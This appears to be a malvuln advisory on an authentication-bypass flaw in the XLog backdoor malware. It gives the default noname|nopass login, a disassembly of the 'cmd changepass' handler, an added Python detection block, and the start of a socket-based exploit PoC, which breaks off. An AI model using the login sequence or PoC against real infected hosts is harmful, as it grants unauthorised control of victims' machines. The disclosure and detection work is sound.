Authored by malvuln | Site malvuln.com

Backdoor.Win32.XLog.21 malware suffers from an authentication bypass vulnerability due to a race condition.

Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/2906b5dc5132dd1319827415e837168f.txt
Contact: [email protected]
Media: twitter.com/malvuln

Threat: Backdoor.Win32.XLog.21
Vulnerability: Authentication Bypass Race Condition
Description: The malware listens on TCP port 5553. Third-party attackers who can reach the system before a password has been set can log on using the default credentials noname/nopass and run the commands made available by the backdoor, including changing the password, thereby potentially locking out the original intruder.

Sending an incorrect username "victim|pass" we get:
Received invalid name parameter!

Sending an incorrect password "noname|pass" we get:
Received incorrect password from client!

Sending the correct noname|nopass credentials we get no error. Next, we must send valid commands using the correct pipe delimiter or we will get "Received invalid parameter" errors.

push offset aCmdChangepass ; "cmd changepass"
004018EA mov edx, [ebp+Str1]
004018ED push edx ; Str1
004018EE call _strcmp
004018F3 add esp, 8
004018F6 test eax, eax
004018F8 jnz loc_4019A6
004018FE lea eax, [ebp+Delimiter]
00401901 push eax ; Delimiter
00401902 push 0 ; String
00401904 call _strtok
00401909 add esp, 8
0040190C mov [ebp+Str1], eax
0040190F cmp [ebp+Str1], 0
00401913 jnz short loc_401930
00401915 push offset aReceivedInvali_4 ; "rnReceived invalid parameter (NULL) f"...
0040191A mov ecx, [ebp+s]
0040191D push ecx ; s
0040191E call sub_4019D9
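Detection logic for the exchange described above and the "cmd changepass" handler shown in the disassembly, as an added example that is not part of the malvuln advisory or the malware: it labels the backdoor's replies and flags default-credential logins and password changes on port 5553 in constructed connection records (the record fields src/dport/payload are an assumed log layout).

```python
# Added example, not code from the malvuln advisory: classify XLog backdoor
# traffic seen by a sensor. Record fields (src, dport, payload) are an
# assumed, constructed log layout, not anything the advisory specifies.

XLOG_PORT = 5553
DEFAULT_CREDS = ("noname", "nopass")          # defaults from the advisory
PIPE = "|"                                    # the backdoor's field delimiter

# Server strings quoted in the advisory, mapped to a short label
RESPONSES = {
    "Received invalid name parameter!": "bad-username",
    "Received incorrect password from client!": "bad-password",
}

def parse_login(payload):
    """Split a 'user|pass' login on the pipe delimiter; None if it is missing."""
    if PIPE not in payload:
        return None
    user, _, password = payload.partition(PIPE)
    return user, password

def classify_response(payload):
    """Label a backdoor reply; an empty reply is what the advisory reports
    for accepted credentials, anything unknown is 'other'."""
    text = payload.strip()
    if not text:
        return "accepted"
    return RESPONSES.get(text, "other")

def flag_records(records):
    """Return alerts for client->port-5553 records: default-credential logins
    and 'cmd changepass' (a third party taking over the backdoor)."""
    alerts = []
    for rec in records:
        if rec["dport"] != XLOG_PORT:
            continue                          # only traffic towards the backdoor
        payload = rec["payload"]
        if parse_login(payload) == DEFAULT_CREDS:
            alerts.append((rec["src"], "xlog-default-creds-login"))
        elif payload.startswith("cmd changepass"):
            alerts.append((rec["src"], "xlog-password-change"))
    return alerts

# Constructed sample: one default-credential login followed by a password change
SAMPLE = [
    {"src": "10.0.0.5", "dport": 5553, "payload": "noname|nopass"},
    {"src": "10.0.0.5", "dport": 5553, "payload": "cmd changepass|newpw"},
    {"src": "10.0.0.7", "dport": 5553, "payload": "victim|pass"},
    {"src": "10.0.0.7", "dport": 80,   "payload": "GET / HTTP/1.1"},
]
```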

Family: XLog
Type: PE32
MD5: 2906b5dc5132dd1319827415e837168f
Vuln ID: MVID-2022-0543
Disclosure: 04/06/2022


Exploit/PoC:
from socket import *
import time

MALWARE_HOST="x.x.x.x"
PORT=5553

def chk_res(s):
    res=""
    while True:
        res += s.recv(512)
        break
    if "